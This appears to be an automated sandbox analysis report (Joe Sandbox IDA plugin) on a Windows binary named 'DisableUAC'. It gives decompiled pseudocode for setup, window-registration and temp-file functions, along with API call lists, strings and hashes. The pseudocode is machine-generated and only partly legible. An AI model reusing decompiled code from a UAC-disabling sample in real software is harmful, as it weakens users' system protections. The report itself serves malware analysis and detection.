API ID: Handle$Close$CreateCriticalSectionstrcat$PipeProcessstrlen$CurrentEnterHeapLeaveObjectSingleWaitmemsetstrcpy$AllocDuplicateExecuteFreeShell
String ID:
API String ID: 2182169213-0
Opcode ID: f65dbbabf9427a08e7f4aeb845cd526f449824baec7207fcc2800cffa1afe664
Instruction ID: f1ee8aa81cfcf5ad22774c24d0904ba422de7dc7aca5be22220759f680d6bdd4
Opcode Fuzzy Hash: f65dbbabf9427a08e7f4aeb845cd526f449824baec7207fcc2800cffa1afe664
Instruction Fuzzy Hash: 71F14976604B808AEB62DF66E8503ED77E0FB89BD8F444115BB4A4BAB8DF79C544C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140004F26 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E00000001140004F26(void* __eflags, intOrPtr _a4, intOrPtr _a8, long long _a12, long long _a16) {
				CHAR* _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v16;
				long long _v20;
				long long _v24;
				char _v36;
				intOrPtr _v40;
				long long _v44;
				long long _v48;
				intOrPtr _v100;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t96;
				void* _t98;
				intOrPtr _t101;
				CHAR* _t102;
				intOrPtr _t103;
				long long _t104;
				CHAR* _t108;
				intOrPtr _t109;
				long long _t115;
				void* _t116;
				long long _t118;
				intOrPtr _t127;
				intOrPtr _t131;
				void* _t133;
				void* _t141;
				void* _t142;
				CHAR* _t150;
				intOrPtr _t155;
				intOrPtr _t164;
				intOrPtr _t165;
				intOrPtr _t168;
				intOrPtr _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				intOrPtr* _t193;
				intOrPtr* _t217;
				intOrPtr* _t223;

				_t82 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0000000114000A040(_t81, 0, _t96, _t171, 0);
				_v48 = 0;
				GetModuleHandleA(0);
				 *0x4001cb98 = 0;
				_push( *0x4001d660);
				_push( *0x4001d660);
				_push(_v44);
				_pop(_t98);
				E000000011400145C0(E00000001140002C94(_t82, _t98), _t81,  &_v36);
				E000000011400053FC(_t82);
				E00000001140004BD3(_t82);
				_push( *0x4001d660);
				E00000001140009FD4(_t80, _t81, 0, _t96, _t171, 0,  *0x4001d660);
				 *0x4001d660 =  &(( *0x4001d660)[1]);
				_t101 =  *0x4001cbd0; // 0x1c07a0
				_pop(_t150);
				 *0x4001d660 = _t150;
				E000000011400146F0(_t101,  &(_t150[ *0x4001d670]));
				if (_t82 == 0) goto 0x40004fe2;
				_t83 = _v40 - 1;
				if (_t83 != 0) goto 0x40004fe2;
				goto 0x40004fe5;
				if (_t83 == 0) goto 0x40004fef;
				E0000000114000311D(_t83);
				E00000001140002F25(_t83);
				_t102 =  *0x4001cc88; // 0x1c7cc0
				E00000001140014780(0, _t102);
				_t103 =  *0x4001cc48; // 0x1c07f0
				E00000001140014780(0, _t103);
				_t104 =  *0x4001cbc8; // 0x1c7dc0
				E000000011400145C0(E00000001140014780(0, _t104), _t81, 0x4001cbc8,  *0x4001d660);
				_push( *0x4001d660);
				E000000011400145C0(E00000001140006CF0(_t80, 0, _t96, 0x800), _t81,  &_v20,  *0x4001d660);
				_push( *0x4001d660);
				_push(_v20);
				_t108 =  *0x4001cc88; // 0x1c7cc0
				E00000001140014780(0x4001b01e, _t108, 0);
				_t109 =  *0x4001cc48; // 0x1c07f0
				E00000001140014780(0x4001b01e, _t109);
				_t193 = _t173 - 8 + 0x28 - 0xffffffffffffffe8 + 0x28 - 0x28 + 0x28 - 0x28 + 0x28 - 0x28 + 0x28 - 0xffffffffffffffe8 + 0x28 - 0xffffffffffffffe8 + 0x20 - 0x20 + 0x20;
				_t155 =  *0x4001d670; // 0x1c0880
				 *_t193 =  *_t193 + _t155;
				GetTempFileNameA( *0x4001d660, 0x4001b01e); // executed
				_pop( *0x4001d660);
				E0000000114001096C(_t79, _t80, 0x4001b01e, _t96, _t171, _v16); // executed
				0x40014a1c( *0x4001cc38);
				E000000011400145C0(E00000001140014780(0x4001b01e, _v16), _t81, 0x4001cbc8,  *0x4001d660);
				E0000000114000490B(_t83);
				_t115 =  *0x4001cb08; // 0x1c7c90
				E000000011400146F0(_t115, 0, _v16);
				if (_t83 != 0) goto 0x40005147;
				_push( *0x4001cb08);
				_pop(_t116);
				E0000000114000378D(_t83, _t116);
				E0000000114000404D();
				0x400149fe( *0x4001cbc8);
				_t118 =  *0x4001cbc8; // 0x1c7dc0
				E00000001140014780(0x4001b01e, _t118);
				E00000001140014780(0x4001b01e, 0x4001b01f);
				E000000011400145C0(E00000001140014780(0x4001b01e, _v24), _t81,  &_v24,  *0x4001d660);
				0x400149fe(_v24);
				E000000011400145C0(E00000001140006CF0(_t80, 0x4001b01e, _t96, 0x800), _t81,  &_v4,  *0x4001d660);
				GetSystemDirectoryA(_v0);
				0x40014a04(_v0, 0x800,  *0x4001d660);
				_push( *0x4001d660);
				_push(0x45);
				_push( *0x4001cbb0);
				_t127 =  *0x4001cc68; // 0x1c0780
				_push( *0x4001d660);
				E00000001140014780(0x4001b01e, _t127);
				E00000001140014780(0x4001b01e, 0x4001b01f);
				E00000001140014780(0x4001b01e, _v12);
				 *0x4001d660 =  &(( *0x4001d660)[1]);
				_push( *0x4001d660);
				E00000001140014780(0x4001b01e, _a4);
				_t131 =  *0x4001cb80; // 0x1c0760
				E00000001140014780(0x4001b01e, _t131);
				_t217 = _t193 - 0x20 + 0x28 - 0x28 + 0x28 - 0x28 + 0x28 - 0x28 + 0x28 - 0x28 + 0x28 - 0xffffffffffffffe8 + 0x28 - 0xffffffffffffffe0 + 0x28 - 0x28 + 0x28 - 0x28 + 0x28 - 0x20 + 0x20 - 0x20 + 0x20;
				_t164 =  *0x4001d670; // 0x1c0880
				 *_t217 =  *_t217 + _t164;
				_t165 =  *0x4001d670; // 0x1c0880
				_v100 = _v100 + _t165;
				E0000000114000A6A4(); // executed
				_pop( *0x4001d660);
				 *0x4001cbe8 = 0x4001b01e;
				_push( *0x4001cbe8);
				_pop(_t133); // executed
				E0000000114000A6F4(_t133); // executed
				_a12 = 0x4001b01e;
				E0000000114000A718();
				SetConsoleCtrlHandler(0x1400032c4); // executed
				E00000001140004811();
				0x40014a0a( *0x4001cbc8, 0,  *0x4001cbe8);
				E0000000114001096C(_t79, _t80, 0x1400032c4, _t96, _t171,  *0x4001cbc8); // executed
				E0000000114001096C(_t79, _t80, 0x1400032c4, _t96, _t171,  *0x4001cca8); // executed
				E0000000114001096C(_t79, _t80, 0x1400032c4, _t96, _t171,  *0x4001cba0);
				_push( *0x4001d660);
				_push( *0x4001d660);
				_push( *0x4001d660);
				_push( *0x4001d660);
				E00000001140009E04(_t80, 0x1400032c4, _t96, _t171,  *0x4001d660);
				_t223 = _t217 - 0x20 + 0x28 - 0xffffffffffffffe0 + 0x20;
				_t168 =  *0x4001d670; // 0x1c0880
				 *_t223 =  *_t223 + _t168;
				_pop(_t141);
				E000000011400109F0(_t81, 0x1400032c4, _t96, _t141, _t171, _t172);
				_t225 = _t223 - 0x20 + 0x28;
				_t170 =  *0x4001d670; // 0x1c0880
				 *_t225 =  *(_t223 - 0x20 + 0x28) + _t170;
				_pop(_t142);
				E000000011400109D4(0x1400032c4, _t142); // executed
				_pop( *0x4001d660);
				RemoveDirectoryA( *0x4001cc80);
				RemoveDirectoryA( *0x4001cc88); // executed
				 *0x4001cab0 = _a16;
				_push(0);
				E00000001140014750(_v8);
				E00000001140014750(_a8);
				return E00000001140014750(_v0);
			}

0x140004f26
0x140004f2b
0x140004f2c
0x140004f2d
0x140004f2e
0x140004f34
0x140004f39
0x140004f44
0x140004f49
0x140004f50
0x140004f56
0x140004f5c
0x140004f60
0x140004f74
0x140004f79
0x140004f7e
0x140004f83
0x140004f9e
0x140004fa7
0x140004fae
0x140004fb5
0x140004fb6
0x140004fc4
0x140004fcc
0x140004fd3
0x140004fd7
0x140004fe0
0x140004fe8
0x140004fea
0x140004fef
0x140004ff4
0x140005005
0x14000500e
0x140005019
0x140005022
0x14000503e
0x140005043
0x14000506d
0x140005072
0x14000507c
0x140005090
0x1400050a1
0x1400050aa
0x1400050b5
0x1400050ba
0x1400050be
0x1400050c5
0x1400050d3
0x1400050dc
0x1400050e7
0x1400050f8
0x14000511d
0x140005122
0x140005127
0x140005131
0x140005139
0x14000513b
0x140005141
0x140005142
0x140005147
0x140005153
0x140005158
0x140005169
0x140005180
0x1400051a1
0x1400051ab
0x1400051da
0x1400051ea
0x1400051f4
0x1400051f9
0x140005203
0x140005208
0x14000520e
0x140005215
0x14000521f
0x140005236
0x140005248
0x140005251
0x14000525d
0x140005267
0x140005270
0x14000527b
0x140005280
0x140005284
0x14000528b
0x14000528f
0x140005296
0x1400052a5
0x1400052ae
0x1400052b4
0x1400052bb
0x1400052c1
0x1400052c2
0x1400052c7
0x1400052d3
0x1400052ea
0x1400052ef
0x1400052fb
0x140005307
0x140005313
0x14000531f
0x140005324
0x14000532e
0x140005338
0x14000533e
0x14000534f
0x140005354
0x140005358
0x14000535f
0x140005363
0x140005369
0x14000536e
0x140005372
0x140005379
0x14000537d
0x140005382
0x14000538b
0x140005398
0x1400053a4
0x1400053ae
0x1400053bd
0x1400053c7
0x1400053d9
0x1400053fb

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,02370A20,0000000140001B9B), ref: 0000000140004F44

Part of subcall function 00000001400145C0: HeapAlloc.KERNEL32 ref: 0000000140014603

Part of subcall function 0000000140009FD4: strncpy.MSVCRT ref: 000000014000A027

Part of subcall function 00000001400146F0: strcmp.MSVCRT ref: 0000000140014730

GetTempFileNameA.KERNEL32 ref: 00000001400050D3
PathRenameExtensionA.SHLWAPI ref: 00000001400050F8
PathQuoteSpacesA.SHLWAPI ref: 0000000140005153
PathQuoteSpacesA.SHLWAPI ref: 00000001400051AB
GetSystemDirectoryA.KERNEL32 ref: 00000001400051EA
PathAddBackslashA.SHLWAPI ref: 00000001400051F4
SetConsoleCtrlHandler.KERNEL32 ref: 00000001400052EA
PathUnquoteSpacesA.SHLWAPI ref: 00000001400052FB

Part of subcall function 0000000140009E04: GetModuleFileNameA.KERNEL32 ref: 0000000140009E31
Part of subcall function 0000000140009E04: memmove.MSVCRT(?,?,?,0000000140002CD0,?,?,?,?,?,00000000,00000000,00000000,02370A20,0000000140004F6A), ref: 0000000140009E59

Part of subcall function 00000001400109F0: memmove.MSVCRT(?,?,?,0000000140004282), ref: 0000000140010A6C

Part of subcall function 00000001400109D4: SetCurrentDirectoryA.KERNEL32 ref: 00000001400109DD

RemoveDirectoryA.KERNEL32 ref: 0000000140005398
RemoveDirectoryA.KERNEL32 ref: 00000001400053A4

Strings

*?\BFINOPSX, xrefs: 0000000140005172, 0000000140005228

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Path$Directory$Spaces$FileModuleNameQuoteRemovememmove$AllocBackslashConsoleCtrlCurrentExtensionHandleHandlerHeapRenameSystemTempUnquotestrcmpstrncpy
String ID: *?\BFINOPSX
API String ID: 3343402428-3528665286
Opcode ID: 7aa33634eb230c175275b461a2b8aaef315627a64d8826d5dbe0e0ecb0c05a4e
Instruction ID: fba63a64170432e1affb21cadb7a85ab63444194cfac21f86e401ff6f7545efd
Opcode Fuzzy Hash: 7aa33634eb230c175275b461a2b8aaef315627a64d8826d5dbe0e0ecb0c05a4e
Instruction Fuzzy Hash: 09B1ECB6A18A45D4FB17AFA7BC86BE93271A75D3D5F101011FB485B2B3EE3AC0918710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400116A4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 57
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E000000011400116A4(void* __rdx) {
				long long _v24;
				long long _v40;
				signed long long _v48;
				signed long long _v56;
				long long _v64;
				signed int _v68;
				long long _v80;
				intOrPtr _v88;
				signed long long _v96;
				long long _v104;
				signed long long _v112;
				signed long long _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				signed int _v144;
				signed int _v152;
				void* __rbx;
				void* _t40;
				long long _t48;
				long long _t49;
				void* _t58;
				void* _t59;

				_t2 = __rdx + 0x48; // 0x48
				r8d = _t2;
				memset(??, ??, ??);
				_v68 = _v68 & 0x00000000;
				_v56 = _v56 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_t50 = "PostEventClass";
				_v80 = 0x1400115e4;
				_t48 =  *0x4001caa8; // 0x140000000
				_v88 = 8;
				_v40 = 0x10;
				_v24 = "PostEventClass";
				_v64 = _t48;
				RegisterClassA(??);
				_v96 = _v96 & 0x00000000;
				_t49 =  *0x4001caa8; // 0x140000000
				r9d = 0xc00000;
				r8d = 0;
				_v104 = _t49;
				_v112 = _v112 & 0x00000000;
				_v120 = _v120 & 0x00000000;
				_v128 = 1;
				_v136 = 1;
				_v144 = _v144 & 0x00000000;
				_v152 = _v152 & 0x00000000;
				CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
				 *0x4001da30 = _t49;
				 *0x4001da20 = RegisterWindowMessageA(??);
				E00000001140013750(0x48, _t49, "PostEventClass", 0x14001166c);
				r8d = 0;
				 *0x4001da40 = _t49;
				_v152 = 0x400;
				_t40 = E00000001140011ECC(0x1400116a3, _t49, _t50, "PB_PostEventMessage", 0x14001166c, _t58, _t59, 0x14001169c, 0x4001d598); // executed
				 *0x4001d598 = _t49;
				if ( *0x4001b00e == 0) goto 0x400117d7;
				InitializeCriticalSection(??);
				return _t40;
			}

0x1400116b4
0x1400116b4
0x1400116b8
0x1400116bd
0x1400116c2
0x1400116cb
0x1400116db
0x1400116e2
0x1400116e7
0x1400116f3
0x1400116fb
0x140011707
0x14001170f
0x140011714
0x14001171a
0x140011720
0x140011727
0x14001172d
0x140011730
0x140011735
0x14001173b
0x14001174b
0x14001174f
0x140011753
0x140011758
0x14001175d
0x14001176a
0x14001178a
0x140011790
0x140011795
0x1400117a3
0x1400117aa
0x1400117b5
0x1400117c1
0x1400117c8
0x1400117d1
0x1400117df

APIs

memset.MSVCRT ref: 00000001400116B8
RegisterClassA.USER32 ref: 0000000140011714
CreateWindowExA.USER32 ref: 000000014001175D
RegisterWindowMessageA.USER32 ref: 0000000140011771

Part of subcall function 0000000140013750: HeapAlloc.KERNEL32 ref: 000000014001376C

Part of subcall function 0000000140011ECC: HeapAlloc.KERNEL32 ref: 0000000140011F05
Part of subcall function 0000000140011ECC: HeapAlloc.KERNEL32 ref: 0000000140011F36
Part of subcall function 0000000140011ECC: HeapAlloc.KERNEL32 ref: 0000000140011FA8

InitializeCriticalSection.KERNEL32 ref: 00000001400117D1

Strings

PostEventClass, xrefs: 00000001400116DB
PB_PostEventMessage, xrefs: 0000000140011763

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AllocHeap$RegisterWindow$ClassCreateCriticalInitializeMessageSectionmemset
String ID: PB_PostEventMessage$PostEventClass
API String ID: 3030622450-297677326
Opcode ID: f4455f476325c8fdee96cb8fe6e8ab471ac390fae45ccc4554f72dfbb93c00e3
Instruction ID: b8b26908a23dfbd696b9977191a9a2e6126a9f9a1e3f1d7fa1238f6512cf360e
Opcode Fuzzy Hash: f4455f476325c8fdee96cb8fe6e8ab471ac390fae45ccc4554f72dfbb93c00e3
Instruction Fuzzy Hash: 5C310B72514B4986E712CF12F8557DA77A1F78C389F444116E7894BAB9DF7EC148CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400108A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140014840: HeapReAlloc.KERNEL32 ref: 00000001400148A7

GetTempPathA.KERNEL32 ref: 00000001400108CA
LoadLibraryA.KERNEL32 ref: 00000001400108D9
GetProcAddress.KERNEL32 ref: 00000001400108F1
GetLongPathNameA.KERNELBASE(?,?,?,0000000140003478,?,?,?,?,?,?,?,?,?,00000000,02370A20,0000000140005438), ref: 0000000140010905
FreeLibrary.KERNEL32 ref: 000000014001090C

Strings

Kernel32.DLL, xrefs: 00000001400108D0
GetLongPathNameA, xrefs: 00000001400108E7

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTemp
String ID: GetLongPathNameA$Kernel32.DLL
API String ID: 3547342574-822094646
Opcode ID: 0bc86b3dfefb4d1098db578d940ede74bcaf67fab31a306840972340ab564954
Instruction ID: 535753e80eeaa6b5c46716a352de06058d557743e77d242da3cd7210a760feb4
Opcode Fuzzy Hash: 0bc86b3dfefb4d1098db578d940ede74bcaf67fab31a306840972340ab564954
Instruction Fuzzy Hash: 71015E7170575186EB059F27B89439A66A1AB8DBC0F585039FB8E4B7AADE39C8418340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001000 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 616
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			_entry_(long long __rax) {
				void* _t1;
				void* _t12;
				void* _t22;
				void* _t23;
				void* _t25;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t100;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				intOrPtr _t119;
				signed long long _t120;
				intOrPtr _t123;
				intOrPtr _t126;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				intOrPtr _t138;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr* _t155;
				intOrPtr* _t157;
				intOrPtr* _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				long long _t164;
				intOrPtr _t169;
				void* _t172;
				intOrPtr _t176;
				intOrPtr _t181;
				intOrPtr _t189;
				intOrPtr _t191;
				intOrPtr _t193;
				intOrPtr _t195;
				intOrPtr _t197;
				intOrPtr _t199;
				intOrPtr _t201;
				intOrPtr _t203;
				intOrPtr _t205;
				intOrPtr _t207;
				intOrPtr _t209;
				intOrPtr _t211;
				intOrPtr _t213;
				intOrPtr _t215;
				intOrPtr _t217;
				intOrPtr _t219;
				intOrPtr _t221;
				intOrPtr _t223;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t229;
				intOrPtr _t231;
				intOrPtr _t233;
				intOrPtr _t235;
				intOrPtr _t237;
				intOrPtr _t239;
				intOrPtr _t241;
				intOrPtr _t243;
				intOrPtr _t245;
				intOrPtr _t247;
				intOrPtr _t252;
				void* _t269;
				intOrPtr _t271;
				intOrPtr _t327;
				void* _t338;
				void* _t339;
				void* _t340;
				void* _t341;
				intOrPtr _t452;
				intOrPtr _t453;
				intOrPtr _t454;
				intOrPtr _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				intOrPtr _t458;
				intOrPtr _t459;
				intOrPtr _t460;
				intOrPtr _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				intOrPtr _t464;
				intOrPtr _t465;
				intOrPtr _t466;
				intOrPtr _t467;
				intOrPtr _t468;
				intOrPtr _t469;
				intOrPtr _t470;
				intOrPtr _t471;
				intOrPtr _t472;
				intOrPtr _t473;
				intOrPtr _t474;
				intOrPtr _t475;
				intOrPtr _t476;
				intOrPtr _t477;
				intOrPtr _t478;
				void* _t512;
				intOrPtr _t515;
				intOrPtr _t519;
				intOrPtr _t521;
				intOrPtr _t523;
				intOrPtr _t526;
				intOrPtr _t528;
				intOrPtr _t530;
				intOrPtr _t532;

				0x40006000();
				0x40006006();
				 *0x4001caa8 = __rax;
				0x4000600c(); // executed
				 *0x4001caa0 = __rax;
				 *0x4001cb10 = 0x4001b322; // executed
				_t1 = E00000001140014440(0x4001b322); // executed
				E00000001140011EA0(E00000001140014170(_t1)); // executed
				E000000011400116A4(0x1000); // executed
				E00000001140010C60(0x4001b322, 0x1000);
				E000000011400107EC(); // executed
				E00000001140010500(0x4001b322); // executed
				E00000001140010328(0x4001b322);
				E00000001140010294(0x4001b322, 0x1000); // executed
				E0000000114000EBFC(_t108, 0x4001b322); // executed
				E0000000114000D844(0x4001b322, 0x1000); // executed
				_t12 = E0000000114000C484(0x4001b322, 0x1000); // executed
				E0000000114000C030(_t12);
				E0000000114000B9A8(0x4001b322);
				E00000001140009DBC(); // executed
				E000000011400098E8(0x1000);
				_t176 =  *0x4001ccd8; // 0x21a3630
				E0000000114000C05C(_t172, _t176);
				E0000000114000BF50(_t172, 0xc, 0x4001ccd8, _t339, _t340, _t341, 0x4001b060);
				E00000001140013FEC(0x4001ccc8, _t172, 0xc, 0x401, _t340, _t341, 0x4001b080); // executed
				 *0x4001ccc8 = 0x4001ccc8;
				E00000001140011ECC(_t109, 0x4001ccc8, _t172, 8, 0x15, _t340, _t341, 0, 0x4001ccf8, 0x200, 0x4001ccc8);
				_t181 =  *0x4001cce8; // 0x21a7830
				E0000000114000C05C(_t172, _t181);
				E0000000114000BF50(_t172, 0xc, 0x4001cce8, _t339, _t340, _t341, 0x4001b070);
				_t22 = E000000011400144D0(0x4001ccc8, 0x4001cc20, 0x4001b021);
				 *0x4001cc00 = 0x1e5;
				 *0x4001cc08 = 0x4001b13d;
				0x40010560();
				 *0x4001cba8 = 0x4001ccc8;
				 *0x4001cb28 = 0;
				_t119 =  *0x4001cc00; // 0x1e5
				_t113 = _t119 -  *0x4001cb28; // 0x68a532ad
				if (_t113 < 0) goto 0x4000123a;
				_t515 =  *0x4001cc08; // 0x14001b13d
				_t120 = _t515 +  *0x4001cb28;
				_t23 = E00000001140010580(_t22, _t120);
				_push(_t120 * 0xffffffff);
				_t519 =  *0x4001cba8; // 0x2370840
				E00000001140010590(_t23, _t109, _t519 +  *0x4001cb28);
				 *0x4001cb28 =  *0x4001cb28 + 1;
				if (_t113 >= 0) goto 0x400011e3;
				_t123 =  *0x4001d660; // 0x0
				_push(_t123);
				_push(_t123);
				_t521 =  *0x4001cc00; // 0x1e5
				_push(_t521 + 0xfffffff8);
				_t523 =  *0x4001cba8; // 0x2370840
				_pop(_t269);
				_t25 = E000000011400105A0(_t110, _t523 + 4, _t172, _t523 + 4, _t269, _t340); // executed
				E000000011400145C0(_t25, _t109, 0x4001caf8);
				_t126 =  *0x4001d660; // 0x0
				_t271 =  *0x4001cc20; // 0x1c0860
				_t189 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006060(_t107, _t111, _t112, _t126, _t172, _t189, _t271, _t340), _t109, 0x4001caf8, _t126);
				_t127 =  *0x4001d660; // 0x0
				_t452 =  *0x4001cc20; // 0x1c0860
				_t191 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t127, _t172, _t191, _t339, _t340, 0x4001b13d, _t452, _t512), _t109, 0x4001cb68, _t127);
				_t128 =  *0x4001d660; // 0x0
				_t453 =  *0x4001cc20; // 0x1c0860
				_t193 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t128, _t172, _t193, _t339, _t340, 0x4001b13d, _t453, _t512), _t109, 0x4001cc10, _t128);
				_t129 =  *0x4001d660; // 0x0
				_t454 =  *0x4001cc20; // 0x1c0860
				_t195 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t129, _t172, _t195, _t339, _t340, 0x4001b13d, _t454, _t512), _t109, 0x4001cb58, _t129);
				_t130 =  *0x4001d660; // 0x0
				_t455 =  *0x4001cc20; // 0x1c0860
				_t197 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t130, _t172, _t197, _t339, _t340, 0x4001b13d, _t455, _t512), _t109, 0x4001ccc0, _t130);
				_t131 =  *0x4001d660; // 0x0
				_t456 =  *0x4001cc20; // 0x1c0860
				_t199 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t131, _t172, _t199, _t339, _t340, 0x4001b13d, _t456, _t512), _t109, 0x4001cb70, _t131);
				_t132 =  *0x4001d660; // 0x0
				_t457 =  *0x4001cc20; // 0x1c0860
				_t201 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t132, _t172, _t201, _t339, _t340, 0x4001b13d, _t457, _t512), _t109, 0x4001cc50, _t132);
				_t133 =  *0x4001d660; // 0x0
				_t458 =  *0x4001cc20; // 0x1c0860
				_t203 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t133, _t172, _t203, _t339, _t340, 0x4001b13d, _t458, _t512), _t109, 0x4001cb00, _t133);
				_t134 =  *0x4001d660; // 0x0
				_t459 =  *0x4001cc20; // 0x1c0860
				_t205 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t134, _t172, _t205, _t339, _t340, 0x4001b13d, _t459, _t512), _t109, 0x4001cb88, _t134);
				_t135 =  *0x4001d660; // 0x0
				_t460 =  *0x4001cc20; // 0x1c0860
				_t207 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t135, _t172, _t207, _t339, _t340, 0x4001b13d, _t460, _t512), _t109, 0x4001cc98, _t135);
				_t136 =  *0x4001d660; // 0x0
				_t461 =  *0x4001cc20; // 0x1c0860
				_t209 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t136, _t172, _t209, _t339, _t340, 0x4001b13d, _t461, _t512), _t109, 0x4001cb18, _t136);
				_t137 =  *0x4001d660; // 0x0
				_t462 =  *0x4001cc20; // 0x1c0860
				_t211 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t137, _t172, _t211, _t339, _t340, 0x4001b13d, _t462, _t512), _t109, 0x4001ccb0, _t137);
				_t138 =  *0x4001d660; // 0x0
				_t463 =  *0x4001cc20; // 0x1c0860
				_t213 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t138, _t172, _t213, _t339, _t340, 0x4001b13d, _t463, _t512), _t109, 0x4001cc30, _t138);
				_t139 =  *0x4001d660; // 0x0
				_t464 =  *0x4001cc20; // 0x1c0860
				_t215 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t139, _t172, _t215, _t339, _t340, 0x4001b13d, _t464, _t512), _t109, 0x4001cb90, _t139);
				_t140 =  *0x4001d660; // 0x0
				_t465 =  *0x4001cc20; // 0x1c0860
				_t217 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t140, _t172, _t217, _t339, _t340, 0x4001b13d, _t465, _t512), _t109, 0x4001cbf0, _t140);
				_t141 =  *0x4001d660; // 0x0
				_t466 =  *0x4001cc20; // 0x1c0860
				_t219 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t141, _t172, _t219, _t339, _t340, 0x4001b13d, _t466, _t512), _t109, 0x4001cad8, _t141);
				_t142 =  *0x4001d660; // 0x0
				_t467 =  *0x4001cc20; // 0x1c0860
